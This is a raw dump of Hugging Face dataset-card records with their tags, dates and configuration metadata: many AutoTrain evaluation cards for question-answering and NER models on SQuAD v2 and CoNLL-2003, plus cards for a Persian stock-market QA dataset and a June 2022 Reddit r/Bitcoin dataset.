"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/roberta-large-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
eee0a8ef4396cb4882284ec2fda1d0ccfd8d5550 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: Shanny/bert-finetuned-squad
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@ola13](https://huggingface.co/ola13) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-810261fd-11725561 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T08:33:54+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "Shanny/bert-finetuned-squad", "metrics": ["accuracy"], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T08:36:36+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: Shanny/bert-finetuned-squad
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @ola13 for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: Shanny/bert-finetuned-squad\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ola13 for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: Shanny/bert-finetuned-squad\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ola13 for evaluating this model."
] |
1439a395520ae8c2068bad1e1b07b8d5f052b9be | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-ebf1ec50-11735562 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T10:33:05+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/deberta-v3-base-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T10:37:39+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/deberta-v3-base-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/deberta-v3-base-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
09d0cf6b8b8cf1c47c25270219270ee5b2207921 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/tinyroberta-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e85023ec-11745564 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T10:37:45+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/tinyroberta-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T10:40:25+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/tinyroberta-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/tinyroberta-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/tinyroberta-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
55b56822e4f31bfb149e822c0004ad25ad90fb94 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e85023ec-11745565 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T10:37:49+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/roberta-large-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T10:42:15+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/roberta-large-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/roberta-large-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
15a9bdb8362664a48997e28994c2baf46eaa71f2 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e85023ec-11745563 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T10:38:34+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/deberta-v3-base-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T10:47:52+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/deberta-v3-base-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/deberta-v3-base-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
87c34d7017c665a0bb76b416bcfb62bfe17a2ae6 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-large-uncased-whole-word-masking-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-26568076-11755566 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T10:49:05+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/bert-large-uncased-whole-word-masking-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T10:53:57+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-large-uncased-whole-word-masking-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/bert-large-uncased-whole-word-masking-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/bert-large-uncased-whole-word-masking-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
de7be88799fc7659e1e51edbcf4a85f37d249e05 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@MichelBartels](https://huggingface.co/MichelBartels) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-df3d9ae8-11765567 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T11:05:23+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/deberta-v3-large-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T11:13:39+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @MichelBartels for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/deberta-v3-large-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @MichelBartels for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/deberta-v3-large-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @MichelBartels for evaluating this model."
] |
9d347362dc8663670ef1512728cdaccf282ef29b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Token Classification
* Model: AJGP/bert-finetuned-ner
* Dataset: conll2003
* Config: conll2003
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@hrezaeim](https://huggingface.co/hrezaeim) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-conll2003-2dc2f6d8-11805572 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T13:25:58+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["conll2003"], "eval_info": {"task": "entity_extraction", "model": "AJGP/bert-finetuned-ner", "metrics": [], "dataset_name": "conll2003", "dataset_config": "conll2003", "dataset_split": "test", "col_mapping": {"tokens": "tokens", "tags": "ner_tags"}}} | 2022-07-25T13:27:10+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Token Classification
* Model: AJGP/bert-finetuned-ner
* Dataset: conll2003
* Config: conll2003
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @hrezaeim for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Token Classification\n* Model: AJGP/bert-finetuned-ner\n* Dataset: conll2003\n* Config: conll2003\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @hrezaeim for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Token Classification\n* Model: AJGP/bert-finetuned-ner\n* Dataset: conll2003\n* Config: conll2003\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @hrezaeim for evaluating this model."
] |
249e666291cd556d0c0c7967ee3cb6967d77b56c |
# Dataset Card for [Dataset Name]
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:**
- **Repository:**
- **Paper:**
- **Leaderboard:**
- **Point of Contact:**
### Dataset Summary
[More Information Needed]
### Supported Tasks and Leaderboards
This dataset is to be served as a reference for QA tasks.
### Languages
Persian
## Dataset Structure
### Data Instances
[More Information Needed]
### Data Fields
[More Information Needed]
### Data Splits
[More Information Needed]
## Dataset Creation
### Curation Rationale
All annotations are done according to the SQuAD2.0 data format.
### Source Data
#### Initial Data Collection and Normalization
All context and some of questions are retrieved from [Faradars Introductory Course to Stock Market](https://blog.faradars.org/%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d8%a8%d9%88%d8%b1%d8%b3-%d8%b1%d8%a7%db%8c%da%af%d8%a7%d9%86/).
#### Who are the source language producers?
Persian (farsi)
### Annotations
#### Annotation process
All annotations are done via Deepset Haystack annotation tool.
#### Who are the annotators?
Hesam Damghanian (this HF account)
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
[More Information Needed]
### Licensing Information
[More Information Needed]
### Citation Information
[More Information Needed]
| hdamghanian/Stock-QA-fa | [
"license:mit",
"region:us"
] | 2022-07-25T14:06:08+00:00 | {"license": "mit"} | 2022-07-25T14:16:43+00:00 | [] | [] | TAGS
#license-mit #region-us
|
# Dataset Card for [Dataset Name]
## Table of Contents
- Table of Contents
- Dataset Description
- Dataset Summary
- Supported Tasks and Leaderboards
- Languages
- Dataset Structure
- Data Instances
- Data Fields
- Data Splits
- Dataset Creation
- Curation Rationale
- Source Data
- Annotations
- Personal and Sensitive Information
- Considerations for Using the Data
- Social Impact of Dataset
- Discussion of Biases
- Other Known Limitations
- Additional Information
- Dataset Curators
- Licensing Information
- Citation Information
- Contributions
## Dataset Description
- Homepage:
- Repository:
- Paper:
- Leaderboard:
- Point of Contact:
### Dataset Summary
### Supported Tasks and Leaderboards
This dataset is to be served as a reference for QA tasks.
### Languages
Persian
## Dataset Structure
### Data Instances
### Data Fields
### Data Splits
## Dataset Creation
### Curation Rationale
All annotations are done according to the SQuAD2.0 data format.
### Source Data
#### Initial Data Collection and Normalization
All context and some of questions are retrieved from Faradars Introductory Course to Stock Market.
#### Who are the source language producers?
Persian (farsi)
### Annotations
#### Annotation process
All annotations are done via Deepset Haystack annotation tool.
#### Who are the annotators?
Hesam Damghanian (this HF account)
## Considerations for Using the Data
### Social Impact of Dataset
### Discussion of Biases
### Other Known Limitations
## Additional Information
### Dataset Curators
### Licensing Information
| [
"# Dataset Card for [Dataset Name]",
"## Table of Contents\n- Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Description\n\n- Homepage:\n- Repository:\n- Paper:\n- Leaderboard:\n- Point of Contact:",
"### Dataset Summary",
"### Supported Tasks and Leaderboards\n\nThis dataset is to be served as a reference for QA tasks.",
"### Languages\n\nPersian",
"## Dataset Structure",
"### Data Instances",
"### Data Fields",
"### Data Splits",
"## Dataset Creation",
"### Curation Rationale\n\nAll annotations are done according to the SQuAD2.0 data format.",
"### Source Data",
"#### Initial Data Collection and Normalization\n\nAll context and some of questions are retrieved from Faradars Introductory Course to Stock Market.",
"#### Who are the source language producers?\n\nPersian (farsi)",
"### Annotations",
"#### Annotation process\n\nAll annotations are done via Deepset Haystack annotation tool.",
"#### Who are the annotators?\n\nHesam Damghanian (this HF account)",
"## Considerations for Using the Data",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations",
"## Additional Information",
"### Dataset Curators",
"### Licensing Information"
] | [
"TAGS\n#license-mit #region-us \n",
"# Dataset Card for [Dataset Name]",
"## Table of Contents\n- Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Description\n\n- Homepage:\n- Repository:\n- Paper:\n- Leaderboard:\n- Point of Contact:",
"### Dataset Summary",
"### Supported Tasks and Leaderboards\n\nThis dataset is to be served as a reference for QA tasks.",
"### Languages\n\nPersian",
"## Dataset Structure",
"### Data Instances",
"### Data Fields",
"### Data Splits",
"## Dataset Creation",
"### Curation Rationale\n\nAll annotations are done according to the SQuAD2.0 data format.",
"### Source Data",
"#### Initial Data Collection and Normalization\n\nAll context and some of questions are retrieved from Faradars Introductory Course to Stock Market.",
"#### Who are the source language producers?\n\nPersian (farsi)",
"### Annotations",
"#### Annotation process\n\nAll annotations are done via Deepset Haystack annotation tool.",
"#### Who are the annotators?\n\nHesam Damghanian (this HF account)",
"## Considerations for Using the Data",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations",
"## Additional Information",
"### Dataset Curators",
"### Licensing Information"
] |
3038d9967602ee1ba85340246bcd49bb52fd3bef |
# Dataset Card for reddit-r-bitcoin-data-for-jun-2022
## Table of Contents
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Licensing Information](#licensing-information)
## Dataset Description
- **Homepage:** [https://socialgrep.com/datasets](https://socialgrep.com/datasets/reddit-r-bitcoin-data-for-jun-2022?utm_source=huggingface&utm_medium=link&utm_campaign=redditrbitcoindataforjun2022)
- **Reddit downloader used:** [https://socialgrep.com/exports](https://socialgrep.com/exports?utm_source=huggingface&utm_medium=link&utm_campaign=redditrbitcoindataforjun2022)
- **Point of Contact:** [Website](https://socialgrep.com/contact?utm_source=huggingface&utm_medium=link&utm_campaign=redditrbitcoindataforjun2022)
### Dataset Summary
Lite version of our premium [Reddit /r/Bitcoin dataset](https://socialgrep.com/datasets/the-reddit-r-bitcoin-dataset?utm_source=huggingface&utm_medium=link&utm_campaign=redditrbitcoindataforjun2022) - CSV of all posts & comments to the /r/Bitcoin subreddit over Jun 2022.
### Languages
Mainly English.
## Dataset Structure
### Data Instances
A data point is a post or a comment. Due to the separate nature of the two, those exist in two different files - even though many fields are shared.
### Data Fields
- 'type': the type of the data point. Can be 'post' or 'comment'.
- 'id': the base-36 Reddit ID of the data point. Unique when combined with type.
- 'subreddit.id': the base-36 Reddit ID of the data point's host subreddit. Unique.
- 'subreddit.name': the human-readable name of the data point's host subreddit.
- 'subreddit.nsfw': a boolean marking the data point's host subreddit as NSFW or not.
- 'created_utc': a UTC timestamp for the data point.
- 'permalink': a reference link to the data point on Reddit.
- 'score': score of the data point on Reddit.
- 'domain': (Post only) the domain of the data point's link.
- 'url': (Post only) the destination of the data point's link, if any.
- 'selftext': (Post only) the self-text of the data point, if any.
- 'title': (Post only) the title of the post data point.
- 'body': (Comment only) the body of the comment data point.
- 'sentiment': (Comment only) the result of an in-house sentiment analysis pipeline. Used for exploratory analysis.
## Additional Information
### Licensing Information
CC-BY v4.0
| SocialGrep/reddit-r-bitcoin-data-for-jun-2022 | [
"annotations_creators:lexyr",
"language_creators:crowdsourced",
"multilinguality:monolingual",
"size_categories:100K<n<1M",
"source_datasets:original",
"language:en",
"license:cc-by-4.0",
"region:us"
] | 2022-07-25T17:11:58+00:00 | {"annotations_creators": ["lexyr"], "language_creators": ["crowdsourced"], "language": ["en"], "license": ["cc-by-4.0"], "multilinguality": ["monolingual"], "size_categories": ["100K<n<1M"], "source_datasets": ["original"]} | 2022-07-25T17:22:16+00:00 | [] | [
"en"
] | TAGS
#annotations_creators-lexyr #language_creators-crowdsourced #multilinguality-monolingual #size_categories-100K<n<1M #source_datasets-original #language-English #license-cc-by-4.0 #region-us
|
# Dataset Card for reddit-r-bitcoin-data-for-jun-2022
## Table of Contents
- Dataset Description
- Dataset Summary
- Supported Tasks and Leaderboards
- Languages
- Dataset Structure
- Data Instances
- Data Fields
- Data Splits
- Dataset Creation
- Curation Rationale
- Source Data
- Annotations
- Personal and Sensitive Information
- Considerations for Using the Data
- Social Impact of Dataset
- Discussion of Biases
- Other Known Limitations
- Additional Information
- Licensing Information
## Dataset Description
- Homepage: URL
- Reddit downloader used: URL
- Point of Contact: Website
### Dataset Summary
Lite version of our premium Reddit /r/Bitcoin dataset - CSV of all posts & comments to the /r/Bitcoin subreddit over Jun 2022.
### Languages
Mainly English.
## Dataset Structure
### Data Instances
A data point is a post or a comment. Due to the separate nature of the two, those exist in two different files - even though many fields are shared.
### Data Fields
- 'type': the type of the data point. Can be 'post' or 'comment'.
- 'id': the base-36 Reddit ID of the data point. Unique when combined with type.
- 'URL': the base-36 Reddit ID of the data point's host subreddit. Unique.
- 'URL': the human-readable name of the data point's host subreddit.
- 'URL': a boolean marking the data point's host subreddit as NSFW or not.
- 'created_utc': a UTC timestamp for the data point.
- 'permalink': a reference link to the data point on Reddit.
- 'score': score of the data point on Reddit.
- 'domain': (Post only) the domain of the data point's link.
- 'url': (Post only) the destination of the data point's link, if any.
- 'selftext': (Post only) the self-text of the data point, if any.
- 'title': (Post only) the title of the post data point.
- 'body': (Comment only) the body of the comment data point.
- 'sentiment': (Comment only) the result of an in-house sentiment analysis pipeline. Used for exploratory analysis.
